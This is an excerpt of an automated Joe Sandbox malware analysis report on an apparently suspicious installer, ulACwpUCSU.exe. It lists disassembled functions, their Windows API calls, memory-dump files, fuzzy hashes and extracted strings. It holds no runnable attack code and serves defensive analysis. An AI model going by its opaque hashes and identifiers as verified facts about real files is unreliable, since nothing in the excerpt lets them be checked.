                                          • CreateBrushIndirect.GDI32(?), ref: 004040EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                          • Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
                                          • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                          • Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65
                                          Function 100021FA Relevance: 10.6, APIs: 7, Instructions: 139memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                            • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                          • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                          • String ID:
                                          • API String ID: 3730416702-0
                                          • Opcode ID: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
                                          • Instruction ID: fe65b043c70383bd2b49c92c90746d4950a0c6047a38c1932a2dc3020861886a
                                          • Opcode Fuzzy Hash: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
                                          • Instruction Fuzzy Hash: F6418BB1108711EFF720DFA48884B5BB7F8FF443D1F218929F946D61A9DB34AA448B61
                                          Function 100023DA Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                          • GlobalFree.KERNEL32(?), ref: 100024B9
                                          • GlobalFree.KERNEL32(00000000), ref: 100024F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_10000000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$Free$Alloc
                                          • String ID:
                                          • API String ID: 1780285237-0
                                          • Opcode ID: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
                                          • Instruction ID: 82133e1bc6da927614d5bcfc3b496831b4cb396c3e6da136b8b2dca3161aa200
                                          • Opcode Fuzzy Hash: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
                                          • Instruction Fuzzy Hash: 75319CB1504251EFF722CF94CCC4C6B7BBDEB852D4B128569FA4193228DB31AC54DB62
                                          Function 00402683 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D7
                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026F3
                                          • GlobalFree.KERNEL32(?), ref: 0040272C
                                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 0040273E
                                          • GlobalFree.KERNEL32(00000000), ref: 00402745
                                          • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 0040275D
                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 00402771
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                          • String ID:
                                          • API String ID: 3294113728-0
                                          • Opcode ID: 0f129fd7f7df80537c5f9e1eb6f54556ad660c5267986f7df7bd7c5007d73d3e
                                          • Instruction ID: 552098977e22cffcc29eaacdabede243c0f20e1b5d71923adfcfca28e3e686eb
                                          • Opcode Fuzzy Hash: 0f129fd7f7df80537c5f9e1eb6f54556ad660c5267986f7df7bd7c5007d73d3e
                                          • Instruction Fuzzy Hash: 63318DB1C00118BFCF216FA5CD89DAE7E79EF09364F10423AF520762E1C6795D419BA9
                                          Function 00402BDA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          APIs
                                          • DestroyWindow.USER32(00000000,00000000), ref: 00402BF2
                                          • GetTickCount.KERNEL32 ref: 00402C10
                                          • wsprintfA.USER32 ref: 00402C3E
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll), ref: 0040508D
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                          • CreateDialogParamA.USER32(0000006F,00000000,00402B42,00000000), ref: 00402C62
                                          • ShowWindow.USER32(00000000,00000005), ref: 00402C70
                                            • Part of subcall function 00402BBE: MulDiv.KERNEL32(00000000,00000064,00000B8A), ref: 00402BD3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 722711167-2449383134
                                          • Opcode ID: a5c26afaddfd3aecbd3c11435c5afe696aa269bce338e105ebc0525db4289807
                                          • Instruction ID: 53b2eec8c243fd5a5b591a6d8e7090b5e500d3da6e0592f5c5af2241ed808ea0
                                          • Opcode Fuzzy Hash: a5c26afaddfd3aecbd3c11435c5afe696aa269bce338e105ebc0525db4289807
                                          • Instruction Fuzzy Hash: AB0188B0949614ABDB216F64AE4DE9F7B7CFB017057148037FA01B11E1C6B8D541CBAE
                                          Function 004048EA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404905
                                          • GetMessagePos.USER32 ref: 0040490D
                                          • ScreenToClient.USER32(?,?), ref: 00404927
                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404939
                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 0040495F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                          • Instruction ID: 7baaa9b85802c8a5173365c44ed2834cc31749f5d024e9fb4d2ec5e64c2f69ce
                                          • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                          • Instruction Fuzzy Hash: E40140B1D00218BADB01DBA4DC85FFFBBBCAB95721F10412BBA10B61D0C7B469018BA5
                                          Function 00401D26 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDC.USER32(?), ref: 00401D29
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                          • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                          • CreateFontIndirectA.GDI32(0040A7D0), ref: 00401DA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                          • String ID: Times New Roman
                                          • API String ID: 3808545654-927190056
                                          • Opcode ID: d8f1134e0d9cc842e71cdb0a798ee728ace2ac96abc312f9551e68033e09961b
                                          • Instruction ID: b452d76144ce78c1ea2c31cbd89393ff29a213aa8dcca448cc35c7c7cb6754f7
                                          • Opcode Fuzzy Hash: d8f1134e0d9cc842e71cdb0a798ee728ace2ac96abc312f9551e68033e09961b
                                          • Instruction Fuzzy Hash: F8011271948340AFE701DBB0AE0EB9A7F74EB19705F108535F141B72E2C6B954159B2F
                                          Function 00402B42 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B5D
                                          • wsprintfA.USER32 ref: 00402B91
                                          • SetWindowTextA.USER32(?,?), ref: 00402BA1
                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Text$ItemTimerWindowwsprintf
                                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                                          • API String ID: 1451636040-1158693248
                                          • Opcode ID: bccffcf18056edd42c20cb723d80919439a72dcdb3cc8cc3de12e394d3f134cc
                                          • Instruction ID: 4b4d840d1cf11f9656568dd8641bec75cd76f4f3bd4f461a87d93eb2d0bf3f96
                                          • Opcode Fuzzy Hash: bccffcf18056edd42c20cb723d80919439a72dcdb3cc8cc3de12e394d3f134cc
                                          • Instruction Fuzzy Hash: F7F01D70900208BBEF215F61DD4ABEE3779EB00345F00803AFA06B51D0D7F8AA558B9A
                                          Function 004047E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(Supersuspicion Setup: Installing,Supersuspicion Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004046FB,000000DF,00000000,00000400,?), ref: 0040487E
                                          • wsprintfA.USER32 ref: 00404886
                                          • SetDlgItemTextA.USER32(?,Supersuspicion Setup: Installing), ref: 00404899
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ItemTextlstrlenwsprintf
                                          • String ID: %u.%u%s%s$Supersuspicion Setup: Installing
                                          • API String ID: 3540041739-662044061
                                          • Opcode ID: 01753190a1a61c127577f13d1343217740e1c978151e7be2dc7a3714e54fef7e
                                          • Instruction ID: 8631c14a921e8479d2aaee063571767324bc63c1cfe9171b6f21c1c007081b9c
                                          • Opcode Fuzzy Hash: 01753190a1a61c127577f13d1343217740e1c978151e7be2dc7a3714e54fef7e
                                          • Instruction Fuzzy Hash: 90112433A441283BDB0065AD9C49EAF328CDF81334F244637FA25F61D1E9788C1292E8
                                          Function 00401CD0 Relevance: 7.5, APIs: 5, Instructions: 37windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32 ref: 00401CD0
                                          • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                          • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                          • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                          • DeleteObject.GDI32(00000000), ref: 00401D1B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                          • String ID:
                                          • API String ID: 1849352358-0
                                          • Opcode ID: a292c83ed799ffc07f79f2d566bcc1b75fc79782f7c1207366e4e3fc2f279a1e
                                          • Instruction ID: 6051f39560cad2323afa4412615048bf83138bd8777345ea636867f40ea61149
                                          • Opcode Fuzzy Hash: a292c83ed799ffc07f79f2d566bcc1b75fc79782f7c1207366e4e3fc2f279a1e
                                          • Instruction Fuzzy Hash: 01F01DB2A05115BFD701DBA4EE88DAF77BCEB04301B009576F602F2191C7789D019B79
                                          Function 00403A4C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetWindowTextA.USER32(00000000,00422F00), ref: 00403AE4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: TextWindow
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$1033$Supersuspicion Setup: Installing
                                          • API String ID: 530164218-929691339
                                          • Opcode ID: 19cfd19e0caeefaef38e1447d84035fc52b25a49d1c0675f2d636fa1eca01dcb
                                          • Instruction ID: 694a286dd4981efc18ef326c294584d4bec2a1602357d8abc11fec8a6f834ca0
                                          • Opcode Fuzzy Hash: 19cfd19e0caeefaef38e1447d84035fc52b25a49d1c0675f2d636fa1eca01dcb
                                          • Instruction Fuzzy Hash: EC11D4B1B046109BCB24DF15DC809337BBDEB8471A329813BE941A73A1C73D9E029A98
                                          Function 004057C6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 004057CC
                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403201,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76CD3410,004033C9), ref: 004057D5
                                          • lstrcatA.KERNEL32(?,00409014), ref: 004057E6
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004057C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: CharPrevlstrcatlstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 2659869361-787714339
                                          • Opcode ID: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                          • Instruction ID: c144259923a6e848a034fe90771ae4f3275bad2fdba58d127270a3e6eafdfb33
                                          • Opcode Fuzzy Hash: 890135f98a5a9138db31eb4b1572133a55ea61a04d2c03425938916b0e2dddc9
                                          • Instruction Fuzzy Hash: 00D0A962606A306BD20222168C09E8F6A08CF06300B044033F204B62B2C63C0D418FFE
                                          Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                          • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                          • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                            • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                          • String ID:
                                          • API String ID: 1404258612-0
                                          • Opcode ID: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                                          • Instruction ID: 9791f4c70c1528f8983e13c97e2cb0ced061aec02aec85b9ff59acd402aedfa8
                                          • Opcode Fuzzy Hash: ec7151e13ff031cd6146c14c1100c40685b360c9b493fb258c96d19e35a9089b
                                          • Instruction Fuzzy Hash: A0117071901209BEDF01EFA5DD85DAEBBB9EF04344B20807AF505F61A1D7388E55DB28
                                          Function 0040585F Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          APIs
                                          • CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040586D
                                          • CharNextA.USER32(00000000), ref: 00405872
